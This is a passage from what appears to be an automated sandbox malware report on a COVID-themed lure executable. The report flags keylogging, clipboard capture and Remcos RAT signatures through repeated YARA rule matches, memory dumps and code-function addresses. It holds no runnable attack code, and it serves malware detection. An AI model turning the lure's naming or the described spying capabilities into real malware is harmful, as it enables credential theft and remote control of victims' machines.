ree,DeleteDC,DeleteDC,DeleteDC,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 28_2_0040D71E
Creates a DirectInput object (often for capturing keystrokes)
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.416785382.00000000011DB000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_004038DB GetKeyState,GetKeyState,GetKeyState,CallNextHookEx, 28_2_004038DB
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud:

barindex
Yara detected Remcos RAT
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3ed9988.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.418169362.0000000002F23000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.468948804.0000000002900000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.429721772.0000000002900000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.429209935.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.432136781.0000000002900000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.418954944.0000000003ED9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.419012391.0000000003F25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.467780819.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.418279701.0000000002F5D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: UK COVID UPDATES AND ENTITLEMENT.exe PID: 6360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: UK COVID UPDATES AND ENTITLEMENT.exe PID: 6720, type: MEMORYSTR

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3ed9988.6.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3ed9988.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3ed9988.6.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.raw.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
Source: 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000002.418169362.0000000002F23000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000000.429209935.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
Source: 0000001C.00000000.429209935.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000000.429209935.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000002.418954944.0000000003ED9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.419012391.0000000003F25000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.467780819.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
Source: 0000001C.00000002.467780819.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.467780819.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000002.418279701.0000000002F5D000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 920
Detected potential crypto function
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_01470860 0_2_01470860
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_01470870 0_2_01470870
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_07C10112 0_2_07C10112
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_07C100CF 0_2_07C100CF
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_07C1008D 0_2_07C1008D
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_07C10072 0_2_07C10072
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_080F7238 0_2_080F7238
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_080FA2D8 0_2_080FA2D8
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_080F9B48 0_2_080F9B48
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_080FA2C9 0_2_080FA2C9
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_08136948 0_2_08136948
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_0813CA80 0_2_0813CA80
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_08130A80 0_2_08130A80
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_08135310 0_2_08135310
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_08139BA0 0_2_08139BA0
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_0813745F 0_2_0813745F
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_0813B678 0_2_0813B678
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_08133F48 0_2_08133F48
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_0813D790 0_2_0813D790
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013FF1B8 33_2_013FF1B8
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013FD1A0 33_2_013FD1A0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013F0590 33_2_013F0590
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013FDA70 33_2_013FDA70
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013FCE58 33_2_013FCE58
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013F1108 33_2_013F1108
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013F10F8 33_2_013F10F8
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013F1620 33_2_013F1620
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013F1612 33_2_013F1612
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013F0BF0 33_2_013F0BF0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013F0BE0 33_2_013F0BE0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_013F8A08 33_2_013F8A08
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_01428140 33_2_01428140
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_01420090 33_2_01420090
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_014265F0 33_2_014265F0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142F708 33_2_0142F708
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142E738 33_2_0142E738
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142D7B8 33_2_0142D7B8
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_014238D0 33_2_014238D0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_01421DC0 33_2_01421DC0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142EF20 33_2_0142EF20
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142CFD0 33_2_0142CFD0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142DFA0 33_2_0142DFA0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_01428130 33_2_01428130
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_014265E0 33_2_014265E0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142D79D 33_2_0142D79D
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142D7B6 33_2_0142D7B6
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_01425990 33_2_01425990
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_014238C0 33_2_014238C0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_01420D78 33_2_01420D78
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_01421DB0 33_2_01421DB0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142CFC1 33_2_0142CFC1
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142DF85 33_2_0142DF85
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0142DF9E 33_2_0142DF9E
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0665E4A8 33_2_0665E4A8
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0665C1D8 33_2_0665C1D8
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0665F150 33_2_0665F150
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0665B860 33_2_0665B860
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_06657813 33_2_06657813
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0665E497 33_2_0665E497
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_06658CD0 33_2_06658CD0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_066557C1 33_2_066557C1
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_066557D0 33_2_066557D0
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0665B84F 33_2_0665B84F
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Code function: 33_2_0082739A 33_2_0082739A
PE file contains strange resources
Source: UK COVID UPDATES AND ENTITLEMENT.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Section loaded: mscorjit.dll Jump to behavior
Uses 32bit PE files
Source: UK COVID UPDATES AND ENTITLEMENT.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Yara signature match
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.raw.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3ed9988.6.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3ed9988.6.raw.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3ed9988.6.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.raw.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
